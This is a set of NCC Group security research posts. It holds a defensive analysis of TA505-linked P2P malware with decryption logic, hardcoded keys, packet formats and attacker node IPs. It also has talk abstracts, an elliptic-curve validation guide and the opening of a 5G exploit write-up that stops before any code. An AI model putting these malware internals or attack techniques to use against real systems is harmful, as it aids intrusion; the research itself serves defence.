NCC Group Research

Tracking a P2P network related to TA505

This post is by Nikolaos Pantazopoulos and Michael Sandee

tl;dr – Executive Summary

For the past few months NCC Group has been closely tracking the operations of TA505 and the development of their various projects (e.g. Clop). During this research we encountered a number of binary files that we have attributed to the developer(s) of ‘Grace’ (i.e. FlawedGrace). These included a remote administration tool (RAT) used exclusively by TA505. The identified binary files are capable of communicating with each other through a peer-to-peer (P2P) network via UDP. While there does not appear to be a direct interaction between the identified samples and a host infected by ‘Grace’, we believe with medium to high confidence that there is a connection to the developer(s) of ‘Grace’ and the identified binaries.

In summary, we found the following:

• P2P binary files, which are downloaded along with other Necurs components (signed drivers, block lists)
• P2P binary files, which transfer certain information (records) between nodes
• Based on the network IDs of the identified samples, there seem to be at least three different networks running
• The programming style and dropped file formats match the development standards of ‘Grace’

History of TA505’s Shift to Ransomware Operations

2014: Emergence as a group

The threat actor, often referred to as TA505 publicly, has been distinguished as an independent threat actor by NCC Group since 2014. Internally we used the name “Dridex RAT group”. Initially it was a group that integrated quite closely with EvilCorp, utilising their Dridex banking malware platform to execute relatively advanced attacks, using often custom made tools for a single purpose and repurposing commonly available tools such as ‘Ammyy Admin’ and ‘RMS’/’RUT’ to complement their arsenal. The attacks performed mostly consisted of compromising organisations and social engineering victims to execute high value bank transfers to corporate mule accounts. These operations included social engineering correctly implemented two-factor authentication with dual authorization by both the creator of a transaction and the authorizee.

2017: Evolution

Late 2017, EvilCorp and TA505 (Dridex RAT Group) split as a partnership. Our hypothesis is that EvilCorp had started to use the Bitpaymer ransomware to extort organisations rather than doing banking fraud. This built on the fact they had already been using the Locky ransomware previously and was attracting unwanted attention. EvilCorp’s ability to execute enterprise ransomware across large-scale businesses was first demonstrated in May 2017. Their capability and success at pulling off such attacks stemmed from the numerous years of experience in compromising corporate networks for banking fraud activity, specifically moving laterally to separate hosts controlled by employees who had the required access and control of corporate bank accounts. The same techniques in relation to lateral movement and tools (such as Empire, Armitage, Cobalt Strike and Metasploit) enabled EvilCorp to become highly effective in targeted ransomware attacks.

However in 2017 TA505 went on their own path and specifically in 2018 executed a large number of attacks using the tool called ‘Grace’, also known publicly as ‘FlawedGrace’ and ‘GraceWire’. The victims were mostly financial institutions and a large number of the victims were located in Africa, South Asia, and South East Asia with confirmed fraudulent wire transactions and card data theft originating from victims of TA505. The tool ‘Grace’ had some interesting features, and showed some indications that it was originally designed as banking malware which had latterly been repurposed. However, the tool was developed and was used in hundreds of victims worldwide, while remaining relatively unknown to the wider public in its first years of use.

2019: Clop and wider tooling

In early 2019, TA505 started to utilise the Clop ransomware, alongside other tools such as ‘SDBBot’ and ‘ServHelper’, while continuing to use ‘Grace’ up to and including 2021. Today it appears that the group has realised the potential of ransomware operations as a viable business model and the relative ease with which they can extort large sums of money from victims.

The remainder of this post dives deeper into a tool discovered by NCC Group that we believe is related to TA505 and the developer of ‘Grace’. We assess that the identified tool is part of a bigger network, possibly related with Grace infections.

Technical Analysis

The technical analysis we provide below focuses on three components of the execution chain:

1. A downloader – Runs as a service (each identified variant has a different name) and downloads the rest of the components along with a target processes/services list that the driver uses while filtering information. Necurs have used similar downloaders in the past.
2. A signed driver (both x86 and x64 available) – Filters processes/services in order to avoid detection and/or prevent removal. In addition, it injects the payload into a new process.
3. Node tool – Communicates with other nodes in order to transfer victim’s data.

It should be noted that for all above components, different variations were identified. However, the core functionality and purposes remain the same.

Upon execution, the downloader generates a GUID (used as a bot ID) and stores it in the ProgramData folder under the filename regid.1991-06.com.microsoft.dat. Any downloaded file is stored temporarily in this directory. In addition, the downloader reads the version of crypt32.dll in order to determine the version of the operating system.

Next, it contacts the command and control server and downloads the following files:

• t.dat – Expected to contain the string ‘kwREgu73245Nwg7842h’
• p3.dat – P2P Binary. Saved as ‘payload.dll’
• d1c.dat – x86 (signed) Driver
• d2c.dat – x64 (signed) Driver
• bn.dat – List of processes for the driver to filter. Stored as ‘blacknames.txt’
• bs.dat – List of services’ name for the driver to filter. Stored as ‘blacksigns.txt’
• bv.dat – List of files’ version names for the driver to filter. Stored as ‘blackvers.txt’.
• r.dat – List of registry keys for the driver to filter. Stored as ‘registry.txt’

The network communication of the downloader is simple. Firstly, it sends a GET request to the command and control server, downloads and saves on disk the appropriate component. Then, it reads the component from disk and decrypts it (using the RC4 algorithm) with the hardcoded key ‘ABCDF343fderfds21’. After decrypting it, the downloader deletes the file.

Depending on the component type, the downloader stores each of them differently. Any configurations (e.g. list of processes to filter) are stored in registry under the key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID with the value name being the thread ID of the downloader. The data are stored in plaintext with a unique ID value at the start (e.g. 0x20 for the processes list), which is used later by the driver as a communication method.

In addition, in one variant, we detected a reporting mechanism to the command and control server for each step taken. This involves sending a GET request, which includes the generated bot ID along with a status code. The below table summarises each identified request (Table 1).

Driver Analysis

The downloaded driver is the same one that Necurs uses. It has been analysed publically already [1] but in summary, it does the following.

In the first stage, the driver decrypts shellcode, copies it to a new allocated pool and then executes the payload. Next, the shellcode decrypts and runs (in memory) another driver (stored encrypted in the original file). The decryption algorithm remains the same in both cases:

xor_key =  extracted_xor_key
bits = 15
result = b''
data = encrypted[i:i+4]
value = int.from_bytes (data, 'little' )^ xor_key
result += ( _rol(value, bits, 32)  ^ xor_key).to_bytes(4,'little')


Eventually, the decrypted driver injects the payload (the P2P binary) into a new process (‘wmiprvse.exe’) and proceeds with the filtering of data.

A notable piece of code of the driver is the strings’ decryption routine, which is also present in recent GraceRAT samples, including the same XOR key (1220A51676E779BD877CBECAC4B9B8696D1A93F32B743A3E6790E40D745693DE58B1DD17F65988BEFE1D6C62D5416B25BB78EF0622B5F8214C6B34E807BAF9AA).

The identified sample is written in C++ and interacts with other nodes in the network using UDP. We believe that the downloaded binary file is related with TA505 for (at least) the following reasons:

1. Same serialisation library
2. Same programming style with ‘Grace’ samples
3. Similar naming convention in the configuration’s keys with ‘Grace’ samples
4. Same output files (dsx), which we have seen in previous TA505 compromises. DSX files have been used by ‘Grace’ operators to store information related with compromised machines.

Initialisation Phase

In the initialisation phase, the sample ensures that the configurations have been loaded and the appropriate folders are created.

All identified samples store their configurations in a resource with name XC.

ANALYST NOTE: Due to limit visibility of other nodes, we were not able to identify the purpose of each key of the configurations.

The first configuration stores the following settings:

• cx – Parent name
• nid – Node ID. This is used as a network identification method during network communication. If the incoming network packet does not have the same ID then the packet is treated as a packet from a different network and is ignored.
• dgx – Unknown
• exe – Binary mode flag (DLL/EXE)
• key – RSA key to use for verifying a record
• port – UDP port to listen
• va – Parent name. It includes the node IPs to contact.

The second configuration contains the following settings (or metadata as the developer names them):

• meta – Parent name
• app – Unknown. Probably specifies the variant type of the server. The following seem to be supported:
• target (this is the current set value)
• gate
• drop
• control
• mod – Specifies if current binary is the core module.
• bld – Unknown
• api – Unknown
• llr – Unknown
• llt- Unknown

Next, the sample creates a set of folders and files in a directory named ‘target’. These folders are:

• node (folder) – Stores records of other nodes
• trash (folder) – Move files for deletion
• units (folder) – Unknown. Appears to contain PE files, which the core module loads.
• sessions (folder) – Active nodes’ sessions
• units.dsx (file) – List of ‘units’ to load
• probes.dsx (file) – Stores the connected nodes IPs along with other metadata (e.g. connection timestamp, port number)
• net.dsx (file) – Node peer name

Network communication

After the initialisation phase has been completed, the sample starts sending UDP requests to a list of IPs in order to register itself into the network and then exchange information.

Every network packet has a header, which has the below structure:

struct Node_Network_Packet_Header
{
BYTE XOR_Key;
BYTE Version; // set to 0x37 ('7')
BYTE Encrypted_node_ID[16]; // XORed with XOR_Key above
BYTE Peer_Name[16]; // Xored with XOR_Key above. Connected peer name
BYTE Command_ID; //Internally called frame type
DWORD Watermark; //XORed with XOR_Key above
DWORD Crc32_Data; //CRC32 of above data
};


When the sample requires adding additional information in a network packet, it uses the below structure:

struct Node_Network_Packet_Payload
{
DWORD Size;
DWORD CRC32_Data;
BYTE Data[Size]; // Xored with same key used in the header packet (XOR_Key)
};

As expected, each network command (Table 2) adds a different set of information in the ‘Data’ field of the above structure but most of the commands follow a similar format. For example, an ‘invitation’ request (Command ID 1) has the structure:

struct Node_Network_Invitation_Packet
{
BYTE CMD_ID;
DWORD Session_Label;
BYTE Invitation_ID[16];
BYTE Node_Peer_Name[16];
WORD Node_Binded_Port;
};

The sample supports a limited set of commands, which have as a primary role to exchange ‘records’ between each other.

ANALYST NOTE: When information, such as record IDs or number of active connections/records, is sent, the binary adds the length of the data followed by the actual data. For example, in case of sending number of active connections and records:

01 05 01 02 01 02

The above is translated as:

2 active connections from a total of 5 with 2 records.

Moreover, when a node receives a request, it sends an echo reply (includes the same packet header) to acknowledge that the request was read. In general, the following types are supported:

• Request type of 0x10 for echo request.
• Request type of 0x07 when sending data, which fit in one packet.
• Request type of 0xD when sending data in multiple packets (size of payload over 1419 bytes).
• Request type 0x21. It exists in the binary but not supported during the network communications.

Record files

As mentioned already, a record has its own sub-folder under the ‘node’ folder with each sub-folder containing the below files:

• m – Metadata of record file
• l – Unknown purpose

The metadata file contains a set of information for the record such as the node peer name and the node network ID. Among this information, the keys ‘tag’ and ‘pwd’ appear to be very important too. The ‘tag’ key represents a command (different from table 2 set) that the node will execute once it receives the record. Currently, the binary only supports the command ‘updates’. The payload file (p) keeps the updated content encrypted with the value of key ‘pwd’ being the AES key.

Even though we have not been able yet to capture any network traffic for the above command, we believe that it is used to update the current running core module.

IoCs

Nodes’ IPs

45.142.213[.]139:555

195.123.246[.]14:555

45.129.137[.]237:33964

78.128.112[.]139:33964

145.239.85[.]6:3333

References

NCC Group Research

Conference Talks – December 2021

This month, members of NCC Group will be presenting their work at the following conferences:

• Matt Lewis (NCC Group) & Mark McFadden, “Show me the numbers: Workshop on Analyzing IETF Data (AID)”, to be presented at the IETF Internet Architecture Board Workshop on Analyzing IETF Data 2021 (November 29 – December 1 2021)
• Michael Gough, “ARTHIR: ATT&CK Remote Threat Hunting Incident Response Windows Tool”, to be presented at Open Source Digital Forensics Conference (December 1 2021)
• Juan Garrido, “From Hero to Zero. Hardening Microsoft 365 services”, to be presented at STIC – CCN-CERT (December 3 2021)
• Jennifer Fernick, “Financial Post-Quantum Cryptography in Production: A CISO’s Guide”, to be presented at FS-ISAC (December 21 2021)

Show me the numbers: Workshop on Analyzing IETF Data (AID)
Matt Lewis (NCC Group) & Mark McFadden
IETF Internet Architecture Board Workshop on Analyzing IETF Data 2021
November 29 – December 1 2021

RFCs have played a pivotal role in helping to formalise ideas and requirements for much of the Internet’s design and engineering. They have facilitated peer review amongst engineers, researchers and computer scientists, which in turn has resulted in specification of key Internet protocols and their behaviours so that developers can implement those protocols in products and services, with a degree of certainty around correctness in design and interoperability between different implementations. Security considerations within RFCs were not present from the outset, but rather, evolved over time as the Internet grew in size and complexity, and as our understanding of security concepts and best practices matured. Arguably, security requirements across the corpus of RFCs (over 8,900 at the time of writing) has been inconsistent, and perhaps attests to how and when we often see security vulnerabilities manifest themselves both in protocol design, and subsequent implementation.

In early 2021, Research Director Matt Lewis of NCC Group (global cyber security and risk mitigation specialists) released research exploring properties of RFCs in terms of security, which included analyses on how security is (or isn’t) prescribed within RFCs. This was done in order to help understand, how and why security vulnerabilities manifest themselves from design to implementation. The research parsed RFCs, extracting RFC data and metadata into graph databases to explore and query relationships between different properties of RFCs. The ultimate aim of the research was to use any key observations and insights to stimulate further thought and discussion on how and where security improvements could be made to the RFC process, allowing for maximised security assurance at protocol specification and design so as to facilitate security and defence-in-depth. The research showed the value of mining large volumes of data for the purpose of gaining useful insights, and the value of techniques such as graph databases to help cut through the complexities involved with processing and interpreting large volumes of data.

Following publication of NCC Group’s research, other interested parties read it and identified commonalities with research performed by Mark McFadden (of Internet Policy Advisors LTD), an expert on the development of global internet addressing standards and policies, and an active contributor to work in the IETF and ICANN. Mark had very similar research goals to NCC Group, and in that endeavour he had performed analysis around RFC3552 (Guidelines for Writing RC Text on Security Considerations). RFC3552 provides guidance to authors in crafting RFC text on Security Considerations. Mark noted that the RFC is more than fifteen years old and with the threat landscape and security ecosystem significantly changed since the RFC was published, RFC3552 is a candidate for update. Mark authored an internet draft proposing that, prior to drafting an update to RFC3552, an examination of recent, published Security Considerations sections be carried out as a baseline for how to improve RFC3552. His draft suggested a methodology for examining Security Considerations sections in published RFCs and the extraction of both quantitative and qualitative information that could inform a revision of the older guidance. It also reported on an experiment involving textual analysis of sixteen years of RFC Security Consideration sections.

Matt and Mark are thus very much aligned on this topic, and between their respective approaches, have already gone some way in seeking to baseline how RFC Security Considerations should be expressed and improved. They are therefore seeking to collaborate further on this topic, which will include even further analysis of empirical evidence that exists within the vast bodies of IETF data. Matt and Mark would welcome participation at the forthcoming workshop on analysing IETF Data (AID), 2021. We propose active contribution by way of presentation of our existing research and insights, and would welcome community engagement and discussion on the topic so as to understand how we can utilise the IETF data for the baselining and improvement of security requirement specification within the RFC process.

ARTHIR: ATT&CK Remote Threat Hunting Incident Response Windows Tool
Michael Gough
Open Source Digital Forensics Conference
December 1 2021

ArTHIR is a modular framework that can be used remotely against one, or many target systems to perform threat hunting, incident response, compromise assessments, configuration, containment, and any other activities you can conjure up utilizing built-in PowerShell (any version) and Windows Remote Management (WinRM).

This is an improvement to the well-known tool Kansa, but with more capabilities than just running PowerShell scripts. ArTHIR makes it easier to push and execute any binary remotely and retrieve back the output!

One goal of ArTHIR is for you to map your threat hunting and incident response modules to the MITRE ATT&CK Framework. Map your modules to one or more tactics and technique IDs and fill in your MITRE ATT&CK Matrix on your capabilities, and gaps needing improvement.

Have an idea for a module? Have a utility you want run remotely but no easy way to do it volume? ArTHIR provides you this capability. An open source project, hosted on GitHub, everyone is encouraged to contribute and build modules, share ideas, and request updates. There is even a SLACK page to ask questions, share ideas, and collaborate.

Included in ArTHIR are all the original Kansa modules, and several LOG-MD free edition modules. Also included is a template of some key items you will need to build your own PowerShell or utility modules.

From Hero to Zero. Hardening Microsoft 365 services
Juan Garrido
STIC – CCN-CERT
December 3 2021

In this talk, Juan will describe and demonstrate multiple techniques for bypassing existing Office 365 application security controls, showing how data can be exfiltrated from highly secure Office 365 tenants which employ strict security policies, such as Network-Location or Conditional Access Policies, which are used to control access to cloud applications.

Juan will also introduce a new PowerShell module that will help IT security administrators to better prevent, respond and react to bad actors in Microsoft 365 tenants.

Financial Post-Quantum Cryptography in Production: A CISO’s Guide
Jennifer Fernick
FS-ISAC
December 21 2021

Security leaders have to constantly filter signal from noise about emerging threats, including security risks associated with novel emerging technologies like quantum computing. In this presentation, we will explore post-quantum cryptography specifically through the lens of upgrading financial institutions’ cryptographic infrastructure.

We’re going to take a different approach to most post-quantum presentations, by not discussing quantum mechanics or why quantum computing is a threat, and instead starting from the known fact that most of the public-key cryptography on the internet will be trivially broken by existing quantum algorithms, and cover strategic applied security topics to address this need for a cryptographic upgrade, such as:

• Financial services use cases for cryptography and quantum-resistance, and context-specific nuances in computing environments such as mainframes, HSMs, public cloud, CI/CD pipelines, third-party and multi-party financial protocols, customer-facing systems, and more
• Whether quantum technologies like QKD are necessary to achieve quantum-resistant security
• Post-quantum cryptographic algorithms for digital signatures, key distribution, and encryption
• How much confidence cryptanalysts currently have in the quantum-resistance of those ciphers, and what this may mean for cryptography standards over time
• Deciding when to begin integrating PQC in a world of competing technology standards
• Designing extensible cryptographic architectures
• Actions financial institutions’ cryptography teams can take immediately

This presentation is rooted in both research and practice, is entirely vendor- and product-agnostic, and will be easily accessible to non-cryptographers, helping security leaders think through the practical challenges and tradeoffs when deploying quantum-resistant technologies.

NCC Group Research

Public Report – Zendoo Proof Verifier Cryptography Review

During the summer of 2021, Horizen Labs engaged NCC Group to conduct a cryptography review of Zendoo protocol’s proof verifier. This system generates and verifies modified Marlin proofs with a polynomial commitment scheme based on the hardness of the discrete logarithm problem in prime-order groups. The system also provides optimized batch verification of accumulated proofs. The review included a large number of supporting elements for the proof system, such as the underlying field arithmetic, instantiations of specific elliptic curves, a custom hash function, and optimized Merkle Tree implementations. NCC Group assigned three consultants for a total of 42 person-days over the course of five calendar weeks on this review. Following this review, NCC Group performed a retest of the findings uncovered during the initial engagement a few weeks later.

NCC Group Research

An Illustrated Guide to Elliptic Curve Cryptography Validation

Elliptic Curve Cryptography (ECC) has become the de facto standard for protecting modern communications. ECC is widely used to perform asymmetric cryptography operations, such as to establish shared secrets or for digital signatures. However, insufficient validation of public keys and parameters is still a frequent cause of confusion, leading to serious vulnerabilities, such as leakage of secret keys, signature malleability or interoperability issues.

The purpose of this blog post is to provide an illustrated description of the typical failures related to elliptic curve validation and how to avoid them in a clear and accessible way. Even though a number of standards1,2 mandate these checks, implementations frequently fail to perform them.

While this blog post describes some of the necessary concepts behind elliptic curve arithmetic and cryptographic protocols, it does not cover elliptic curve cryptography in detail, which has already been done extensively. The following blog posts are good resources on the topic: A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography by Nick Sullivan and Elliptic Curve Cryptography: a gentle introduction by Andrea Corbellini.

In elliptic curve cryptography, public keys are frequently sent between parties, for example to establish shared secrets using Elliptic curve Diffie–Hellman (ECDH). The goal of public key validation is to ensure that keys are legitimate (by providing assurance that there is an existing, associated private key) and to circumvent attacks leading to the leakage of some information about the private key of a legitimate user.

Issues related to public key validation seem to routinely occur in two general areas. First, transmitting public keys using digital communication requires to convert them to bytes. However, converting these bytes back to an elliptic curve point is a common source of issues, notably due to canonicalization. Second, once public keys have been decoded, some mathematical subtleties of the elliptic curve operations may also lead to different types of attacks. We will discuss these subtleties in the remainder of this blog post.

TL;DR

In general3, vulnerabilities may arise when applications fail to check that:

1. The point coordinates are lower than the field modulus.
2. The coordinates correspond to a valid curve point.
3. The point is not the point at infinity.
4. The point is in the correct subgroup.

An Illustrated Guide to Validating ECC Curve Points

Elliptic curves are curves given by an equation of the form $y^2 = x^3 + ax + b$ (called short Weierstrass form). Elliptic curve cryptography deals with the group of points on that elliptic curve, namely, a set of $(x, y)$ values satisfying the curve equation.

These values, called coordinates (more specifically, affine coordinates), are defined over a field. For use in Cryptography, we work with coordinates defined over a finite field. For the purpose of this blog post, we will concentrate our efforts on the field of integers modulo $p$, with $p$ a prime number (and $p > 3$), which we call the field modulus. Elements of this field can take any value between $0$ and $p - 1$ . In the following figure, the white squares depict valid field elements while grey squares represent the elements that are larger than the field modulus.

Mathematically, a value larger than the field modulus is equivalent to its reduced form (that is, in the $0$ to $p-1$ range, see congruence classes), but in practice these ambiguities may lead to complex issues4.

In ECC, a public key is simply a point on the curve. Since curve points are generally first encoded to byte arrays before being transmitted, the first step when receiving an encoded curve point is to decode it. This is what we identified earlier as the first area of confusion and potential source of vulnerabilities. Specifically, what happens when the integer representation of the coordinates we decoded are larger than the field modulus?

This is the first common source of issues and the reason for our first validation rules:

Check that the point coordinates are lower than the field modulus.

What can go wrong? If the recipient does not enforce that coordinates are lower than the field modulus, some elliptic curve point operations may be incorrectly computed. Additionally, different implementations may have diverging interpretations of the validity of a point, possibly leading to interoperability issues, which can be a critical issue in consensus-driven deployments.

In the figure below, this means that the point coordinates should be rejected if they are not in the white area in the bi-dimensional plane.

Since both coordinates are elements of this finite field, it might seem that an elliptic curve point could theoretically take any value in the white area above. However, not all pairs of $(x, y)$ values in this plane are valid curve points; remember that they need to satisfy the curve equation $y^2 = x^3 + ax + b$ in order to be on the curve. We represent the valid curve point in blue in the figure below5. The number of points on the curve is referred to as the curve order.

This is another common source of issues and where our second validation rule arises:

Check that the point coordinates correspond to a valid curve point (i.e. that the coordinates satisfy the curve equation).

What can go wrong? If the recipient of a public key fails to verify that the point is on the curve, an attacker may be able to perform a so-called invalid curve attack6. Some point operations being independent of the value of $b$ in the elliptic curve equation, a malicious peer may carefully select a different curve (by varying the value of $b$) in which the security is reduced (namely, the discrete logarithm problem is easier than on the original curve). By then sending a point on that new curve (and provided the legitimate peer fails to verify that the point coordinates satisfy the curve equation), the attacker may eventually recover the legitimate peer’s secret.

In practice, curve points are rarely sent as pairs of coordinates, which we call uncompressed. Indeed, the $y$-coordinate can be recovered by solving the curve equation for a given $x$, which is why point compression was developed. Point compression reduces the amount of data to be transmitted by (almost) half, at the cost of a few more operations necessary to solve the curve equation. However, solving the equation for a given $x$ may have different outcomes. It can either result in:

• no solutions (in case $y^2$ does not have a square root in the field, i.e. is not a quadratic residue), in which case the point should be rejected; or
• two solutions, $(x, y)$ and $(x, -y)$, due to the fact that $y^2 = (-y)^2$. However, all coordinates must lie in the $0 \ldots p-1$ range, which are all positive numbers. Since we’re working in the field of integers modulo $p$, that negative $y$-coordinate is actually equivalent to the field element $p - y$, which lies in the correct range.

Hence, when compressing a point, an additional byte of data is used to distinguish the correct $y$-coordinate. Specifically, point encoding (following Section 2.3.3 of SEC 1, works by prepending a byte to the coordinate(s) specifying which encoding rule is used, as follows:

• Compressed point: 0x02 || x if y is even and 0x03 || x if y is odd;
• Uncompressed point: 0x04 || x || y.7

Any other value for the first byte should result in the curve point being ignored. Point compression has a significant benefit in that it ensures that the point is on the curve, since in case there is no solution, implementation should reject the point.

Now, the careful reader may have realized that the set of points in the figure above is incomplete. In order for this set to form a group (in the mathematical sense), and be useful in cryptography, it needs to be supplemented with an additional element, the point at infinity. This point, also called neutral element or additive identity, is the element $\mathcal{O}$ such that for any point $P$ on our elliptic curve, $P + \mathcal{O} = \mathcal{O} + P = P$. The figure below shows the previous set of points on our arbitrary curve with the addition of the point at infinity, which we (artificially) positioned slightly outside our plane, in the bottom left corner.

Since the point at infinity is not on the curve, it does not have well-defined $x$ and $y$ coordinates like other curve points. As such, its representation had to be constructed artificially8. Standards (such as SEC 1: Elliptic Curve Cryptography) define the encoding of the point at infinity to be a single octet of value zero. Confusingly, implementations sometimes also use other encodings for the point at infinity, such as a number of zero bytes equal to the size of the coordinates.

Implementations sometimes fail to properly distinguish the point at infinity, and this is where our third validation rule comes from:

Check that the point is not the point at infinity.

What can go wrong? Since multiplying the point at infinity by any scalar results in the point at infinity, an adversary may force the result of a key agreement to be zero if the legitimate recipient fails to check that the point received is not the point at infinity. This goes against the principle of contributory behavior, where some protocols require that both parties contribute to the outcome of an operation such as a key exchange. Failure to enforce this check may have additional negative consequences in other protocols.

Recall that the curve order, say $N$, corresponds to the number of points on the curve. To make matters more complicated, the group of points on an elliptic curve may be further divided into multiple subgroups. Lagrange’s theorem tells us that any subgroup of the group of points on the elliptic curve has an order dividing the order of the original group. Namely, the size (i.e. the number of points) of every subgroup divides the total number of points on the curve.

In cryptography, to ensure that the discrete logarithm problem is hard, curves are selected in such a way that they consist of one subgroup with large, prime order, say $n$, in which all computations are performed. Some curves (such as the NIST curves9, or the curve secp256k110 used in bitcoin) were carefully designed such that $n = N$, namely the prime order group in which we perform operations is the full group of points on the elliptic curve. In contrast, the popular Curve25519 has curve order $N = 8n$, which means that points on this curve can belong to the large prime-order subgroup of size $n$, or to a subgroup with a much smaller order, of size 2, 4 or 8, for example11. The value $h$ such that $h = N/n$ is called the cofactor, it can be thought of as the ratio between the total number of points on the curve and the size of the prime-order subgroup in which cryptographic operations are performed.

To illustrate this notion, consider the figure below in which we have further subdivided our fictitious set of elliptic curve points into two groups. When performing operations on elliptic curve points, we want to stick with operations on points in the larger, prime-order subgroup, identified by the blue points below.

And this is where our last validation rule comes from:

Check that the point is in the correct subgroup.

This can be achieved by checking that $nP = \mathcal{O}$. Indeed, a consequence of Lagrange’s theorem is that any group element multiplied by the order of that group is equal to the neutral element. If $P$ were in the small subgroup, multiplying it by $n$ would not equal $\mathcal{O}$. This highlights another possible method for checking that the point belongs to the correct subgroup; one could also check that $hP \neq \mathcal{O}$. Contrary to the previous validation rules, this check is considerably more expensive since it requires a point multiplication, and as such is sometimes (detrimentally) skipped for efficiency purposes.

What can go wrong? A malicious party sending a point in the orange subgroup, for example as part of an ECDH key agreement protocol, would result in the honest party performing operations limited to that small subgroup. Thus, if the recipient of a public key failed to check that the point was in the correct subgroup, the attacker could perform a so-called small subgroup attack (also known as subgroup confinement attacks) and learn information about the legitimate party’s private key12.

Does that apply to all curves?

While the presentation above is fairly generic and applies in a general sense to all curves, some curves and associated constructions were created to prevent some of these issues by design.

NIST curves (e.g. P-256) and the Bitcoin curve (secp256k1)

These curves have a cofactor value of 1 (namely, $h = 1$). As such, there is only one large subgroup of prime order and all curve points belong to that group. Hence, once the first 3 steps in our validation procedure have been performed, the last step is superfluous.

Curve25519

Curve25519, proposed by Daniel J. Bernstein and specified in RFC 7748, is a popular curve which is notably used in TLS 1.3 for key agreement.

Although Curve25519 has a cofactor of 8, some functions using this curve were designed to prevent cofactor-related issues. For example, the X25519 function used to perform key agreement using Curve25519 mandates specific checks and performs key agreement using only $x$-coordinates, such that invalid curve attacks are avoided. Additionally, the governing RFC states in Section 5 that

Implementations MUST accept non-canonical values and process them as if they had been reduced modulo the field prime. The non-canonical values are 2^255 – 19 through 2^255 – 1 for X25519.

This seems to address most issues discussed in this post. However, there has been some debate13 over the claimed optional nature of these checks.

With the popularity of Curve25519 and the desire for cryptographers to design more exotic protocols with it, the cofactor value of 8 resurfaced as a potential source of problems. Ristretto was designed as a solution to the cofactor pitfalls. Ristretto is an abstraction layer, on top of Curve25519, which essentially restricts curve points to a prime-order subgroup.

Double-Odd Elliptic Curves

Finally, a strong contender in the secure-by-design curve category is the Double-Odd family of elliptic curves, recently proposed by Thomas Pornin. These curves specify a strict and economical encoding, preventing issues with canonicalization and, even though their cofactor is not trivial, a prime order group is defined on them, similar in spirit to Ristretto’s approach, preventing subgroup confinement attacks.

Conclusion

With the ubiquitous use of elliptic curve cryptography, failure to validate elliptic curve points can be a critical issue which is sadly still commonly uncovered during cryptography reviews. While standards and academic publications provide ample directions to correctly validate curve points, implementations still frequently fail to follow these steps. For example, a vulnerability nicknamed Curveball was reported in January 2020, which allowed attacker to perform spoofing attacks in Microsoft Windows by crafting public points. Recently, we also uncovered a critical vulnerability in a number of open-source ECDSA libraries, in which the verification function failed to check that the signature was non-zero, allowing attackers to forge signatures on arbitrary messages, see the technical advisory Arbitrary Signature Forgery in Stark Bank ECDSA Libraries.

This illustrated guide will hopefully serve as an accessible reference on why and how point validation should be performed.

Thank you

The author would like to thank Eric Schorn and Giacomo Pope for their detailed review and helpful feedback.

References

1. Standards for efficient cryptography, SEC 1: Elliptic Curve Cryptography, Section 3.2.2.1 Elliptic Curve Public Key Validation Primitive.
2. NIST Special Publication 800-56A, Section 5.6.2.3.2 FFC Partial Public-Key Validation Routine and 5.6.2.3.3 ECC Full Public-Key Validation Routine.
3. That is, unless using an elliptic curve that was designed specifically to address these potential issues, we will come back to that at the end of this blog post.
4. Specifically, implementations may handle values that are larger than the field modulus in different ways. They may reject non-reduced values (i.e., non-canonical encodings), accept non-reduced values and reduce them modulo the prime order, or accept non-reduced values and discard the most significant bit(s). An interesting example happened with the cryptocurrency Zcash, where different implementations had distinct interpretations regarding the validity of curve points. Some details can be found in a blog post by Henry de Valence, as well as in a public report following a cryptography review performed by NCC Group.
5. Note that this figure does not represent an actual elliptic curve; it is just an arbitrary diagram designed for illustrative purposes.
6. Ingrid Biehl, Bernd Meyer and Volker Müller. “Differential Fault Attacks on Elliptic Curve Cryptosystems”. In: Advances in Cryptology – CRYPTO 2000, 20th Annual International Cryptology Conference, Santa Barbara, California, USA, August 20-24, 2000, Proceedings. 2000, pp. 131–146.
7. Note that there is a hybrid form starting in 0x06 defined in ANSI X9.62, but this format is very rarely used in practice.
8. Note that some curves and alternate point representations (for instance, when working in projective coordinates) may allow the point at infinity to have a well-defined representation.
9. Standardized in FIPS PUB 186-4: Digital Signature Standard (DSS).
10. Standardized in SEC 2: Recommended Elliptic Curve Domain Parameters.
11. The paper Taming the many EdDSAs provides some very interesting discussions around ambiguities in the Ed25519 signature verification equations (which is based on Curve25519). These ambiguities led to different interpretations of the validity of signatures, which resulted in implementations returning different validity results for some signatures, which could be critical in consensus-driven applications.
12. Chae Hoon Lim and Pil Joong Lee. “A Key Recovery Attack on Discrete Log-based Schemes Using a Prime Order Subgroup”. In: Advances in Cryptology – CRYPTO ’97, 17th Annual International Cryptology Conference, Santa Barbara, California, USA, August 17-21, 1997, Proceedings. 1997, pp. 249–263.
13. See https://moderncrypto.org/mail-archive/curves/2017/000896.html.

NCC Group Research

Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks

Following on from our previous blog post ‘The Challenges of Fuzzing 5G Protocols’, in this post, we demonstrate how an attacker could use the results from the fuzz testing to produce an exploit and potentially gain access to a 5G core network.

In this blog post we will be using the PFCP bug (CVE-2021-41794) we’d previously found using Fuzzowski 5GC in Open5GS[1] (present from versions 1.0.0 through 2.3.3), to demonstrate the potential security risk a buffer overflow can cause.

We will cover how to examine the bug for possible exploit, how to create the actual exploit code, and how it is integrated into a PFCP message.  Finally, we will discuss mitigations that can help reduce/eliminate this type of attack.

In this blog we have taken steps to simplify the process in an effort to make it available to a wider audience.  We have used a proof of concept to explain the techniques and turned off some of the standard mitigations to reduce the complexity of the exploit.

Background

Previously we used Fuzzowski 5GC to fuzz the UPF component of the Open5GS project (version 2.2.9).  The fuzz testing found a buffer overflow bug in the function ‘ogs_fqdn_parse‘.  This type of bug is reasonably easy to exploit, and the basic idea is shown below.

We will use this bug to show how a malicious payload can be written to the variable ‘dnn’, the variable overflowed to set the return address, and execution gained to take control of the UPF process.

Test Environment

To make the exploit development easier and to keep the technical details as simple as possible, a few security mitigations were disabled:

• ASLR – Address Space Layout Randomization
• Stack protection
• Stack non-exec (NX)

Many systems run with insufficient mitigations, so testing exploitation in this context makes sense for showing how exploitation might be possible against one of these platforms. Furthermore, most of these mitigations can be bypassed given the right bug conditions. Although we didn’t investigate bypassing these mitigations for this research, it may be possible that certain manifestations of the bug allow for exploitation on a more hardened platform.

The following environments and tools were used to test and develop the exploit:

• Open5GS version 2.2.9 – The target
